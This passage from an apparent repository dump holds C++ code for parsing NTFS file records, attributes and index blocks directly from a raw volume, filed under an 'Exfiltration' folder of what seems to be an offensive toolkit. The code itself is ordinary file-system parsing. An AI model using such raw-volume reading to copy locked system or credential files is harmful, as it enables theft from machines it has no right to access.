Attribute\n\tBYTE\t\t\t\tIndexedFlag;\t// Indexed flag\n\tBYTE\t\t\t\tPadding;\t\t// Padding\n} ATTR_HEADER_RESIDENT;\n\ntypedef struct tagATTR_HEADER_NON_RESIDENT\n{\n\tATTR_HEADER_COMMON\tHeader;\t\t\t// Common data structure\n\tULONGLONG\t\t\tStartVCN;\t\t// Starting VCN\n\tULONGLONG\t\t\tLastVCN;\t\t// Last VCN\n\tWORD\t\t\t\tDataRunOffset;\t// Offset to the Data Runs\n\tWORD\t\t\t\tCompUnitSize;\t// Compression unit size\n\tDWORD\t\t\t\tPadding;\t\t// Padding\n\tULONGLONG\t\t\tAllocSize;\t\t// Allocated size of the attribute\n\tULONGLONG\t\t\tRealSize;\t\t// Real size of the attribute\n\tULONGLONG\t\t\tIniSize;\t\t// Initialized data size of the stream \n} ATTR_HEADER_NON_RESIDENT;\n\n\n// Attribute: STANDARD_INFORMATION\n\n#define\tATTR_STDINFO_PERMISSION_READONLY\t0x00000001\n#define\tATTR_STDINFO_PERMISSION_HIDDEN\t\t0x00000002\n#define\tATTR_STDINFO_PERMISSION_SYSTEM\t\t0x00000004\n#define\tATTR_STDINFO_PERMISSION_ARCHIVE\t\t0x00000020\n#define\tATTR_STDINFO_PERMISSION_DEVICE\t\t0x00000040\n#define\tATTR_STDINFO_PERMISSION_NORMAL\t\t0x00000080\n#define\tATTR_STDINFO_PERMISSION_TEMP\t\t0x00000100\n#define\tATTR_STDINFO_PERMISSION_SPARSE\t\t0x00000200\n#define\tATTR_STDINFO_PERMISSION_REPARSE\t\t0x00000400\n#define\tATTR_STDINFO_PERMISSION_COMPRESSED\t0x00000800\n#define\tATTR_STDINFO_PERMISSION_OFFLINE\t\t0x00001000\n#define\tATTR_STDINFO_PERMISSION_NCI\t\t\t0x00002000\n#define\tATTR_STDINFO_PERMISSION_ENCRYPTED\t0x00004000\n\ntypedef struct tagATTR_STANDARD_INFORMATION\n{\n\tULONGLONG\tCreateTime;\t\t// File creation time\n\tULONGLONG\tAlterTime;\t\t// File altered time\n\tULONGLONG\tMFTTime;\t\t// MFT changed time\n\tULONGLONG\tReadTime;\t\t// File read time\n\tDWORD\t\tPermission;\t\t// Dos file permission\n\tDWORD\t\tMaxVersionNo;\t// Maxim number of file versions\n\tDWORD\t\tVersionNo;\t\t// File version number\n\tDWORD\t\tClassId;\t\t// Class Id\n\tDWORD\t\tOwnerId;\t\t// Owner Id\n\tDWORD\t\tSecurityId;\t\t// Security Id\n\tULONGLONG\tQuotaCharged;\t// Quota charged\n\tULONGLONG\tUSN;\t\t\t// USN Journel\n} ATTR_STANDARD_INFORMATION;\n\n\n// Attribute: ATTRIBUTE_LIST\n\ntypedef struct tagATTR_ATTRIBUTE_LIST\n{\n\tDWORD\t\tAttrType;\t\t// Attribute type\n\tWORD\t\tRecordSize;\t\t// Record length\n\tBYTE\t\tNameLength;\t\t// Name length in characters\n\tBYTE\t\tNameOffset;\t\t// Name offset\n\tULONGLONG\tStartVCN;\t\t// Start VCN\n\tULONGLONG\tBaseRef;\t\t// Base file reference to the attribute\n\tWORD\t\tAttrId;\t\t\t// Attribute Id\n} ATTR_ATTRIBUTE_LIST;\n\n// Attribute: FILE_NAME\n\n#define\tATTR_FILENAME_FLAG_READONLY\t\t0x00000001\n#define\tATTR_FILENAME_FLAG_HIDDEN\t\t0x00000002\n#define\tATTR_FILENAME_FLAG_SYSTEM\t\t0x00000004\n#define\tATTR_FILENAME_FLAG_ARCHIVE\t\t0x00000020\n#define\tATTR_FILENAME_FLAG_DEVICE\t\t0x00000040\n#define\tATTR_FILENAME_FLAG_NORMAL\t\t0x00000080\n#define\tATTR_FILENAME_FLAG_TEMP\t\t\t0x00000100\n#define\tATTR_FILENAME_FLAG_SPARSE\t\t0x00000200\n#define\tATTR_FILENAME_FLAG_REPARSE\t\t0x00000400\n#define\tATTR_FILENAME_FLAG_COMPRESSED\t0x00000800\n#define\tATTR_FILENAME_FLAG_OFFLINE\t\t0x00001000\n#define\tATTR_FILENAME_FLAG_NCI\t\t\t0x00002000\n#define\tATTR_FILENAME_FLAG_ENCRYPTED\t0x00004000\n#define\tATTR_FILENAME_FLAG_DIRECTORY\t0x10000000\n#define\tATTR_FILENAME_FLAG_INDEXVIEW\t0x20000000\n\n#define\tATTR_FILENAME_NAMESPACE_POSIX\t0x00\n#define\tATTR_FILENAME_NAMESPACE_WIN32\t0x01\n#define\tATTR_FILENAME_NAMESPACE_DOS\t\t0x02\n\ntypedef struct tagATTR_FILE_NAME\n{\n\tULONGLONG\tParentRef;\t\t// File reference to the parent directory\n\tULONGLONG\tCreateTime;\t\t// File creation time\n\tULONGLONG\tAlterTime;\t\t// File altered time\n\tULONGLONG\tMFTTime;\t\t// MFT changed time\n\tULONGLONG\tReadTime;\t\t// File read time\n\tULONGLONG\tAllocSize;\t\t// Allocated size of the file\n\tULONGLONG\tRealSize;\t\t// Real size of the file\n\tDWORD\t\tFlags;\t\t\t// Flags\n\tDWORD\t\tER;\t\t\t\t// Used by EAs and Reparse\n\tBYTE\t\tNameLength;\t\t// Filename length in characters\n\tBYTE\t\tNameSpace;\t\t// Filename space\n\tWORD\t\tName[1];\t\t// Filename\n} ATTR_FILE_NAME;\n\n\n// Attribute: VOLUME_INFORMATION\n\n#define\tATTR_VOLINFO_FLAG_DIRTY\t\t0x0001\t// Dirty\n#define\tATTR_VOLINFO_FLAG_RLF\t\t0x0002\t// Resize logfile\n#define\tATTR_VOLINFO_FLAG_UOM\t\t0x0004\t// Upgrade on mount\n#define\tATTR_VOLINFO_FLAG_MONT\t\t0x0008\t// Mounted on NT4\n#define\tATTR_VOLINFO_FLAG_DUSN\t\t0x0010\t// Delete USN underway\n#define\tATTR_VOLINFO_FLAG_ROI\t\t0x0020\t// Repair object Ids\n#define\tATTR_VOLINFO_FLAG_MBC\t\t0x8000\t// Modified by chkdsk\n\ntypedef struct tagATTR_VOLUME_INFORMATION\n{\n\tBYTE\tReserved1[8];\t// Always 0 ?\n\tBYTE\tMajorVersion;\t// Major version\n\tBYTE\tMinorVersion;\t// Minor version\n\tWORD\tFlags;\t\t\t// Flags\n\tBYTE\tReserved2[4];\t// Always 0 ?\n} ATTR_VOLUME_INFORMATION;\n\n\n// Attribute: INDEX_ROOT\n/******************************\n\t\tINDEX_ROOT\n\t---------------------\n\t| Index Root Header |\n\t---------------------\n\t|    Index Header   |\n\t---------------------\n\t|    Index Entry    |\n\t---------------------\n\t|    Index Entry    |\n\t---------------------\n\t|      ......       |\n\t---------------------\n*******************************/\n\n#define\tATTR_INDEXROOT_FLAG_SMALL\t0x00\t// Fits in Index Root File Record\n#define\tATTR_INDEXROOT_FLAG_LARGE\t0x01\t// Index Allocation and Bitmap needed\n\ntypedef struct tagATTR_INDEX_ROOT\n{\n\t// Index Root Header\n\tDWORD\t\tAttrType;\t\t\t// Attribute type (ATTR_TYPE_FILE_NAME: Directory, 0: Index View)\n\tDWORD\t\tCollRule;\t\t\t// Collation rule\n\tDWORD\t\tIBSize;\t\t\t\t// Size of index block\n\tBYTE\t\tClustersPerIB;\t\t// Clusters per index block (same as BPB?)\n\tBYTE\t\tPadding1[3];\t\t// Padding\n\t// Index Header\n\tDWORD\t\tEntryOffset;\t\t// Offset to the first index entry, relative to this address(0x10)\n\tDWORD\t\tTotalEntrySize;\t\t// Total size of the index entries\n\tDWORD\t\tAllocEntrySize;\t\t// Allocated size of the index entries\n\tBYTE\t\tFlags;\t\t\t\t// Flags\n\tBYTE\t\tPadding2[3];\t\t// Padding\n} ATTR_INDEX_ROOT;\n\n\n// INDEX ENTRY\n\n#define\tINDEX_ENTRY_FLAG_SUBNODE\t0x01\t// Index entry points to a sub-node\n#define\tINDEX_ENTRY_FLAG_LAST\t\t0x02\t// Last index entry in the node, no Stream\n\ntypedef struct tagINDEX_ENTRY\n{\n\tULONGLONG\tFileReference;\t// Low 6B: MFT record index, High 2B: MFT record sequence number\n\tWORD\t\tSize;\t\t\t// Length of the index entry\n\tWORD\t\tStreamSize;\t\t// Length of the stream\n\tBYTE\t\tFlags;\t\t\t// Flags\n\tBYTE\t\tPadding[3];\t\t// Padding\n\tBYTE\t\tStream[1];\t\t// Stream\n\t// VCN of the sub node in Index Allocation, Offset = Size - 8\n} INDEX_ENTRY;\n\n\n// INDEX BLOCK\n/******************************\n\t\t INDEX_BLOCK\n\t-----------------------\n\t|  Index Block Header |\n\t-----------------------\n\t|     Index Header    |\n\t-----------------------\n\t|     Index Entry     |\n\t-----------------------\n\t|     Index Entry     |\n\t-----------------------\n\t|       ......        |\n\t-----------------------\n*******************************/\n\n#define\tINDEX_BLOCK_MAGIC\t\t'XDNI'\n\ntypedef struct tagINDEX_BLOCK\n{\n\t// Index Block Header\n\tDWORD\t\tMagic;\t\t\t// \"INDX\"\n\tWORD\t\tOffsetOfUS;\t\t// Offset of Update Sequence\n\tWORD\t\tSizeOfUS;\t\t// Size in words of Update Sequence Number & Array\n\tULONGLONG\tLSN;\t\t\t// $LogFile Sequence Number\n\tULONGLONG\tVCN;\t\t\t// VCN of this index block in the index allocation\n\t// Index Header\n\tDWORD\t\tEntryOffset;\t// Offset of the index entries, relative to this address(0x18)\n\tDWORD\t\tTotalEntrySize;\t// Total size of the index entries\n\tDWORD\t\tAllocEntrySize;\t// Allocated size of index entries\n\tBYTE\t\tNotLeaf;\t\t// 1 if not leaf node (has children)\n\tBYTE\t\tPadding[3];\t\t// Padding\n} INDEX_BLOCK;\n\n#endif\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParser/NTFS_FileRecord.h",
    "content": "/*\n * NTFS Volume and File Record Class\n * \n * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n\n#ifndef\t__NTFS_FILERECORD_H_CYB70289\n#define\t__NTFS_FILERECORD_H_CYB70289\n\n\n///////////////////////////////////////\n// NTFS Volume forward declaration\n///////////////////////////////////////\nclass CNTFSVolume\n{\npublic:\n\tCNTFSVolume(_TCHAR volume);\n\tvirtual ~CNTFSVolume();\n\n\tfriend class CFileRecord;\n\tfriend class CAttrBase;\n\nprivate:\n\tWORD SectorSize;\n\tDWORD ClusterSize;\n\tDWORD FileRecordSize;\n\tDWORD IndexBlockSize;\n\tULONGLONG MFTAddr;\n\tHANDLE hVolume;\n\tBOOL VolumeOK;\n\tATTR_RAW_CALLBACK AttrRawCallBack[ATTR_NUMS];\n\tWORD Version;\n\n\t// MFT file records ($MFT file itself) may be fragmented\n\t// Get $MFT Data attribute to translate FileRecord to correct disk offset\n\tCFileRecord *MFTRecord;\t\t// $MFT File Record\n\tconst CAttrBase *MFTData;\t// $MFT Data Attribute\n\n\tBOOL OpenVolume(_TCHAR volume);\n\npublic:\n\t__inline BOOL IsVolumeOK() const;\n\t__inline WORD GetVersion() const;\n\t__inline ULONGLONG GetRecordsCount() const;\n\n\t__inline DWORD GetSectorSize() const;\n\t__inline DWORD GetClusterSize() const;\n\t__inline DWORD GetFileRecordSize() const;\n\t__inline DWORD GetIndexBlockSize() const;\n\t__inline ULONGLONG GetMFTAddr() const;\n\n\tBOOL InstallAttrRawCB(DWORD attrType, ATTR_RAW_CALLBACK cb);\n\t__inline void ClearAttrRawCB();\n};\t// CNTFSVolume\n\n\n////////////////////////////////////////////\n// List to hold Attributes of the same type\n////////////////////////////////////////////\ntypedef class CSList<CAttrBase> CAttrList;\n\n// It seems VC6.0 doesn't support template class friends\n#if\t_MSC_VER <= 1200\nclass CAttrResident;\nclass CAttrNonResident;\ntemplate <class TYPE_RESIDENT> class CAttr_AttrList;\n#endif\n\n////////////////////////////////\n// Process a single File Record\n////////////////////////////////\nclass CFileRecord\n{\npublic:\n\tCFileRecord(const CNTFSVolume *volume);\n\tvirtual ~CFileRecord();\n\n\tfriend class CAttrBase;\n#if\t_MSC_VER <= 1200\n\t// Walk around VC6.0 compiler defect\n\tfriend class CAttr_AttrList<CAttrResident>;\n\tfriend class CAttr_AttrList<CAttrNonResident>;\n#else\n\ttemplate <class TYPE_RESIDENT> friend class CAttr_AttrList;\t\t// Won't compiler in VC6.0, why?\n#endif\n\nprivate:\n\tconst CNTFSVolume *Volume;\n\tFILE_RECORD_HEADER *FileRecord;\n\tULONGLONG FileReference;\n\tATTR_RAW_CALLBACK AttrRawCallBack[ATTR_NUMS];\n\tDWORD AttrMask;\n\tCAttrList AttrList[ATTR_NUMS];\t// Attributes\n\n\tvoid ClearAttrs();\n\tBOOL PatchUS(WORD *sector, int sectors, WORD usn, WORD *usarray);\n\t__inline void UserCallBack(DWORD attType, ATTR_HEADER_COMMON *ahc, BOOL *bDiscard);\n\tCAttrBase* AllocAttr(ATTR_HEADER_COMMON *ahc, BOOL *bUnhandled);\n\tBOOL ParseAttr(ATTR_HEADER_COMMON *ahc);\n\tFILE_RECORD_HEADER* ReadFileRecord(ULONGLONG &fileRef);\n\tBOOL VisitIndexBlock(const ULONGLONG &vcn, const _TCHAR *fileName, CIndexEntry &ieFound) const;\n\tvoid TraverseSubNode(const ULONGLONG &vcn, SUBENTRY_CALLBACK seCallBack) const;\n\npublic:\n\tBOOL ParseFileRecord(ULONGLONG fileRef);\n\tBOOL ParseAttrs();\n\n\tBOOL InstallAttrRawCB(DWORD attrType, ATTR_RAW_CALLBACK cb);\n\t__inline void ClearAttrRawCB();\n\n\t__inline void SetAttrMask(DWORD mask);\n\tvoid TraverseAttrs(ATTRS_CALLBACK attrCallBack, void *context);\n\t__inline const CAttrBase* FindFirstAttr(DWORD attrType) const;\n\tconst CAttrBase* FindNextAttr(DWORD attrType) const;\n\n\tint GetFileName(_TCHAR *buf, DWORD bufLen) const;\n\t__inline ULONGLONG GetFileSize() const;\n\tvoid GetFileTime(FILETIME *writeTm, FILETIME *createTm = NULL, FILETIME *accessTm = NULL) const;\n\n\tvoid TraverseSubEntries(SUBENTRY_CALLBACK seCallBack) const;\n\t__inline const BOOL FindSubEntry(const _TCHAR *fileName, CIndexEntry &ieFound) const;\n\tconst CAttrBase* FindStream(_TCHAR *name = NULL);\n\n\t__inline BOOL IsDeleted() const;\n\t__inline BOOL IsDirectory() const;\n\t__inline BOOL IsReadOnly() const;\n\t__inline BOOL IsHidden() const;\n\t__inline BOOL IsSystem() const;\n\t__inline BOOL IsCompressed() const;\n\t__inline BOOL IsEncrypted() const;\n\t__inline BOOL IsSparse() const;\n};\t// CFileRecord\n\n\n#include \"NTFS_Attribute.h\"\n\n\nCFileRecord::CFileRecord(const CNTFSVolume *volume)\n{\n\t_ASSERT(volume);\n\tVolume = volume;\n\tFileRecord = NULL;\n\tFileReference = (ULONGLONG)-1;\n\n\tClearAttrRawCB();\n\n\t// Default to parse all attributes\n\tAttrMask = MASK_ALL;\n}\n\nCFileRecord::~CFileRecord()\n{\n\tClearAttrs();\n\n\tif (FileRecord)\n\t\tdelete FileRecord;\n}\n\n// Free all CAttr_xxx\nvoid CFileRecord::ClearAttrs()\n{\n\tfor (int i=0; i<ATTR_NUMS; i++)\n\t{\n\t\tAttrList[i].RemoveAll();\n\t}\n}\n\n// Verify US and update sectors\nBOOL CFileRecord::PatchUS(WORD *sector, int sectors, WORD usn, WORD *usarray)\n{\n\tint i;\n\n\tfor (i=0; i<sectors; i++)\n\t{\n\t\tsector += ((Volume->SectorSize>>1) - 1);\n\t\tif (*sector != usn)\n\t\t\treturn FALSE;\t// USN error\n\t\t*sector = usarray[i];\t// Write back correct data\n\t\tsector++;\n\t}\n\treturn TRUE;\n}\n\n// Call user defined Callback routines for an attribute\n__inline void CFileRecord::UserCallBack(DWORD attType, ATTR_HEADER_COMMON *ahc, BOOL *bDiscard)\n{\n\t*bDiscard = FALSE;\n\n\tif (AttrRawCallBack[attType])\n\t\tAttrRawCallBack[attType](ahc, bDiscard);\n\telse if (Volume->AttrRawCallBack[attType])\n\t\tVolume->AttrRawCallBack[attType](ahc, bDiscard);\n}\n\nCAttrBase* CFileRecord::AllocAttr(ATTR_HEADER_COMMON *ahc, BOOL *bUnhandled)\n{\n\tswitch (ahc->Type)\n\t{\n\t\tcase ATTR_TYPE_STANDARD_INFORMATION:\n\t\t\treturn new CAttr_StdInfo(ahc, this);\n\n\t\tcase ATTR_TYPE_ATTRIBUTE_LIST:\n\t\t\tif (ahc->NonResident)\n\t\t\t\treturn new CAttr_AttrList<CAttrNonResident>(ahc, this);\n\t\t\telse\n\t\t\t\treturn new CAttr_AttrList<CAttrResident>(ahc, this);\n\n\t\tcase ATTR_TYPE_FILE_NAME:\n\t\t\treturn new CAttr_FileName(ahc, this);\n\n\t\tcase ATTR_TYPE_VOLUME_NAME:\n\t\t\treturn new CAttr_VolName(ahc, this);\n\n\t\tcase ATTR_TYPE_VOLUME_INFORMATION:\n\t\t\treturn new CAttr_VolInfo(ahc, this);\n\n\t\tcase ATTR_TYPE_DATA:\n\t\t\tif (ahc->NonResident)\n\t\t\t\treturn new CAttr_Data<CAttrNonResident>(ahc, this);\n\t\t\telse\n\t\t\t\treturn new CAttr_Data<CAttrResident>(ahc, this);\n\n\t\tcase ATTR_TYPE_INDEX_ROOT:\n\t\t\treturn new CAttr_IndexRoot(ahc, this);\n\n\t\tcase ATTR_TYPE_INDEX_ALLOCATION:\n\t\t\treturn new CAttr_IndexAlloc(ahc, this);\n\n\t\tcase ATTR_TYPE_BITMAP:\n\t\t\tif (ahc->NonResident)\n\t\t\t\treturn new CAttr_Bitmap<CAttrNonResident>(ahc, this);\n\t\t\telse\n\t\t\t\t// Resident Bitmap may exist in a directory's FileRecord\n\t\t\t\t// or in $MFT for a very small volume in theory\n\t\t\t\treturn new CAttr_Bitmap<CAttrResident>(ahc, this);\n\n\t\t// Unhandled Attributes\n\t\tdefault:\n\t\t\t*bUnhandled = TRUE;\n\t\t\tif (ahc->NonResident)\n\t\t\t\treturn new CAttrNonResident(ahc, this);\n\t\t\telse\n\t\t\t\treturn new CAttrResident(ahc, this);\n\t}\n}\n\n// Parse a single Attribute\n// Return False on error\nBOOL CFileRecord::ParseAttr(ATTR_HEADER_COMMON *ahc)\n{\n\tDWORD attrIndex = ATTR_INDEX(ahc->Type);\n\tif (attrIndex < ATTR_NUMS)\n\t{\n\t\tBOOL bDiscard = FALSE;\n\t\tUserCallBack(attrIndex, ahc, &bDiscard);\n\n\t\tif (!bDiscard)\n\t\t{\n\t\t\tBOOL bUnhandled = FALSE;\n\t\t\tCAttrBase *attr = AllocAttr(ahc, &bUnhandled);\n\t\t\tif (attr)\n\t\t\t{\n\t\t\t\tif (bUnhandled)\n\t\t\t\t{\n\t\t\t\t\tNTFS_TRACE1(\"Unhandled attribute: 0x%04X\\n\", ahc->Type);\n\t\t\t\t}\n\t\t\t\tAttrList[attrIndex].InsertEntry(attr);\n\t\t\t\treturn TRUE;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tNTFS_TRACE1(\"Attribute Parse error: 0x%04X\\n\", ahc->Type);\n\t\t\t\treturn FALSE;\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE1(\"User Callback has processed this Attribute: 0x%04X\\n\", ahc->Type);\n\t\t\treturn TRUE;\n\t\t}\n\t}\n\telse\n\t{\n\t\tNTFS_TRACE1(\"Invalid Attribute Type: 0x%04X\\n\", ahc->Type);\n\t\treturn FALSE;\n\t}\n}\n\n// Read File Record\nFILE_RECORD_HEADER* CFileRecord::ReadFileRecord(ULONGLONG &fileRef)\n{\n\tFILE_RECORD_HEADER *fr = NULL;\n\tDWORD len;\n\n\tif (fileRef < MFT_IDX_USER || Volume->MFTData == NULL)\n\t{\n\t\t// Take as continuous disk allocation\n\t\tLARGE_INTEGER frAddr;\n\t\tfrAddr.QuadPart = Volume->MFTAddr + (Volume->FileRecordSize) * fileRef;\n\t\tfrAddr.LowPart = SetFilePointer(Volume->hVolume, frAddr.LowPart, &frAddr.HighPart, FILE_BEGIN);\n\n\t\tif (frAddr.LowPart == DWORD(-1) && GetLastError() != NO_ERROR)\n\t\t\treturn FALSE;\n\t\telse\n\t\t{\n\t\t\tfr = (FILE_RECORD_HEADER*)new BYTE[Volume->FileRecordSize];\n\n\t\t\tif (ReadFile(Volume->hVolume, fr, Volume->FileRecordSize, &len, NULL)\n\t\t\t\t&& len==Volume->FileRecordSize)\n\t\t\t\treturn fr;\n\t\t\telse\n\t\t\t{\n\t\t\t\tdelete fr;\n\t\t\t\treturn NULL;\n\t\t\t}\n\t\t}\n\t}\n\telse\n\t{\n\t\t// May be fragmented $MFT\n\t\tULONGLONG frAddr;\n\t\tfrAddr = (Volume->FileRecordSize) * fileRef;\n\n\t\tfr = (FILE_RECORD_HEADER*)new BYTE[Volume->FileRecordSize];\n\n\t\tif (Volume->MFTData->ReadData(frAddr, fr, Volume->FileRecordSize, &len)\n\t\t\t&& len == Volume->FileRecordSize)\n\t\t\treturn fr;\n\t\telse\n\t\t{\n\t\t\tdelete fr;\n\t\t\treturn NULL;\n\t\t}\n\t}\n}\n\n// Read File Record, verify and patch the US (update sequence)\nBOOL CFileRecord::ParseFileRecord(ULONGLONG fileRef)\n{\n\t// Clear previous data\n\tClearAttrs();\n\tif (FileRecord)\n\t{\n\t\tdelete FileRecord;\n\t\tFileRecord = NULL;\n\t}\n\n\tFILE_RECORD_HEADER *fr = ReadFileRecord(fileRef);\n\tif (fr == NULL)\n\t{\n\t\tNTFS_TRACE1(\"Cannot read file record %I64u\\n\", fileRef);\n\n\t\tFileReference = (ULONGLONG)-1;\n\t}\n\telse\n\t{\n\t\tFileReference = fileRef;\n\n\t\tif (fr->Magic == FILE_RECORD_MAGIC)\n\t\t{\n\t\t\t// Patch US\n\t\t\tWORD *usnaddr = (WORD*)((BYTE*)fr + fr->OffsetOfUS);\n\t\t\tWORD usn = *usnaddr;\n\t\t\tWORD *usarray = usnaddr + 1;\n\t\t\tif (PatchUS((WORD*)fr, Volume->FileRecordSize/Volume->SectorSize, usn, usarray))\n\t\t\t{\n\t\t\t\tNTFS_TRACE1(\"File Record %I64u Found\\n\", fileRef);\n\t\t\t\tFileRecord = fr;\n\n\t\t\t\treturn TRUE;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tNTFS_TRACE(\"Update Sequence Number error\\n\");\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE(\"Invalid file record\\n\");\n\t\t}\n\n\t\tdelete fr;\n\t}\n\n\treturn FALSE;\n}\n\n// Visit IndexBlocks recursivly to find a specific FileName\nBOOL CFileRecord::VisitIndexBlock(const ULONGLONG &vcn, const _TCHAR *fileName, CIndexEntry &ieFound) const\n{\n\tCAttr_IndexAlloc *ia = (CAttr_IndexAlloc*)FindFirstAttr(ATTR_TYPE_INDEX_ALLOCATION);\n\tif (ia == NULL)\n\t\treturn FALSE;\n\n\tCIndexBlock ib;\n\tif (ia->ParseIndexBlock(vcn, ib))\n\t{\n\t\tCIndexEntry *ie = ib.FindFirstEntry();\n\t\twhile (ie)\n\t\t{\n\t\t\tif (ie->HasName())\n\t\t\t{\n\t\t\t\t// Compare name\n\t\t\t\tint i = ie->Compare(fileName);\n\t\t\t\tif (i == 0)\n\t\t\t\t{\n\t\t\t\t\tieFound = *ie;\n\t\t\t\t\treturn TRUE;\n\t\t\t\t}\n\t\t\t\telse if (i < 0)\t\t// fileName is smaller than IndexEntry\n\t\t\t\t{\n\t\t\t\t\t// Visit SubNode\n\t\t\t\t\tif (ie->IsSubNodePtr())\n\t\t\t\t\t{\n\t\t\t\t\t\t// Search in SubNode (IndexBlock), recursive call\n\t\t\t\t\t\tif (VisitIndexBlock(ie->GetSubNodeVCN(), fileName, ieFound))\n\t\t\t\t\t\t\treturn TRUE;\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t\treturn FALSE;\t// not found\n\t\t\t\t}\n\t\t\t\t// Just step forward if fileName is bigger than IndexEntry\n\t\t\t}\n\t\t\telse if (ie->IsSubNodePtr())\n\t\t\t{\n\t\t\t\t// Search in SubNode (IndexBlock), recursive call\n\t\t\t\tif (VisitIndexBlock(ie->GetSubNodeVCN(), fileName, ieFound))\n\t\t\t\t\treturn TRUE;\n\t\t\t}\n\n\t\t\tie = ib.FindNextEntry();\n\t\t}\n\t}\n\n\treturn FALSE;\n}\n\n// Traverse SubNode recursivly in ascending order\n// Call user defined callback routine once found an subentry\nvoid CFileRecord::TraverseSubNode(const ULONGLONG &vcn, SUBENTRY_CALLBACK seCallBack) const\n{\n\tCAttr_IndexAlloc *ia = (CAttr_IndexAlloc*)FindFirstAttr(ATTR_TYPE_INDEX_ALLOCATION);\n\tif (ia == NULL)\n\t\treturn;\n\n\tCIndexBlock ib;\n\tif (ia->ParseIndexBlock(vcn, ib))\n\t{\n\t\tCIndexEntry *ie = ib.FindFirstEntry();\n\t\twhile (ie)\n\t\t{\n\t\t\tif (ie->IsSubNodePtr())\n\t\t\t\tTraverseSubNode(ie->GetSubNodeVCN(), seCallBack);\t// recursive call\n\n\t\t\tif (ie->HasName())\n\t\t\t\tseCallBack(ie);\n\n\t\t\tie = ib.FindNextEntry();\n\t\t}\n\t}\n}\n\n// Parse all the attributes in a File Record\n// And insert them into a link list\nBOOL CFileRecord::ParseAttrs()\n{\n\t_ASSERT(FileRecord);\n\n\t// Clear previous data\n\tClearAttrs();\n\n\t// Visit all attributes\n\n\tDWORD dataPtr = 0;\t// guard if data exceeds FileRecordSize bounds\n\tATTR_HEADER_COMMON *ahc = (ATTR_HEADER_COMMON*)((BYTE*)FileRecord + FileRecord->OffsetOfAttr);\n\tdataPtr += FileRecord->OffsetOfAttr;\n\n\twhile (ahc->Type != (DWORD)-1 && (dataPtr+ahc->TotalSize) <= Volume->FileRecordSize)\n\t{\n\t\tif (ATTR_MASK(ahc->Type) & AttrMask)\t// Skip unwanted attributes\n\t\t{\n\t\t\tif (!ParseAttr(ahc))\t// Parse error\n\t\t\t\treturn FALSE;\n\n\t\t\tif (IsEncrypted() || IsCompressed())\n\t\t\t{\n\t\t\t\tNTFS_TRACE(\"Compressed and Encrypted file not supported yet !\\n\");\n\t\t\t\treturn FALSE;\n\t\t\t}\n\t\t}\n\n\t\tdataPtr += ahc->TotalSize;\n\t\tahc = (ATTR_HEADER_COMMON*)((BYTE*)ahc + ahc->TotalSize);\t// next attribute\n\t}\n\n\treturn TRUE;\n}\n\n// Install Attribute raw data CallBack routines for a single File Record\nBOOL CFileRecord::InstallAttrRawCB(DWORD attrType, ATTR_RAW_CALLBACK cb)\n{\n\tDWORD atIdx = ATTR_INDEX(attrType);\n\tif (atIdx < ATTR_NUMS)\n\t{\n\t\tAttrRawCallBack[atIdx] = cb;\n\t\treturn TRUE;\n\t}\n\telse\n\t\treturn FALSE;\n}\n\n// Clear all Attribute CallBack routines\n__inline void CFileRecord::ClearAttrRawCB()\n{\n\tfor (int i = 0; i < ATTR_NUMS; i ++)\n\t\tAttrRawCallBack[i] = NULL;\n}\n\n// Choose attributes to handle, unwanted attributes will be discarded silently\n__inline void CFileRecord::SetAttrMask(DWORD mask)\n{\n\t// Standard Information and Attribute List is needed always\n\tAttrMask = mask | MASK_STANDARD_INFORMATION | MASK_ATTRIBUTE_LIST;\n}\n\n// Traverse all Attribute and return CAttr_xxx classes to User Callback routine\nvoid CFileRecord::TraverseAttrs(ATTRS_CALLBACK attrCallBack, void *context)\n{\n\t_ASSERT(attrCallBack);\n\n\tfor (int i = 0; i < ATTR_NUMS; i ++)\n\t{\n\t\tif (AttrMask & (((DWORD)1)<<i))\t// skip masked attributes\n\t\t{\n\t\t\tconst CAttrBase *ab = AttrList[i].FindFirstEntry();\n\t\t\twhile (ab)\n\t\t\t{\n\t\t\t\tBOOL bStop;\n\t\t\t\tbStop = FALSE;\n\t\t\t\tattrCallBack(ab, context, &bStop);\n\t\t\t\tif (bStop)\n\t\t\t\t\treturn;\n\n\t\t\t\tab = AttrList[i].FindNextEntry();\n\t\t\t}\n\t\t}\n\t}\n}\n\n// Find Attributes\n__inline const CAttrBase* CFileRecord::FindFirstAttr(DWORD attrType) const\n{\n\tDWORD attrIdx = ATTR_INDEX(attrType);\n\n\treturn attrIdx < ATTR_NUMS ? AttrList[attrIdx].FindFirstEntry() : NULL;\n}\n\nconst CAttrBase* CFileRecord::FindNextAttr(DWORD attrType) const\n{\n\tDWORD attrIdx = ATTR_INDEX(attrType);\n\n\treturn attrIdx < ATTR_NUMS ? AttrList[attrIdx].FindNextEntry() : NULL;\n}\n\n// Get File Name (First Win32 name)\nint CFileRecord::GetFileName(_TCHAR *buf, DWORD bufLen) const\n{\n\t// A file may have several filenames\n\t// Return the first Win32 filename\n\tCAttr_FileName *fn = (CAttr_FileName*)AttrList[ATTR_INDEX(ATTR_TYPE_FILE_NAME)].FindFirstEntry();\n\twhile (fn)\n\t{\n\t\tif (fn->IsWin32Name())\n\t\t{\n\t\t\tint len = fn->GetFileName(buf, bufLen);\n\t\t\tif (len != 0)\n\t\t\t\treturn len;\t// success or fail\n\t\t}\n\n\t\tfn = (CAttr_FileName*)AttrList[ATTR_INDEX(ATTR_TYPE_FILE_NAME)].FindNextEntry();\n\t}\n\n\treturn 0;\n}\n\n// Get File Size\n__inline ULONGLONG CFileRecord::GetFileSize() const\n{\n\tCAttr_FileName *fn = (CAttr_FileName*)AttrList[ATTR_INDEX(ATTR_TYPE_FILE_NAME)].FindFirstEntry();\n\treturn fn ? fn->GetFileSize() 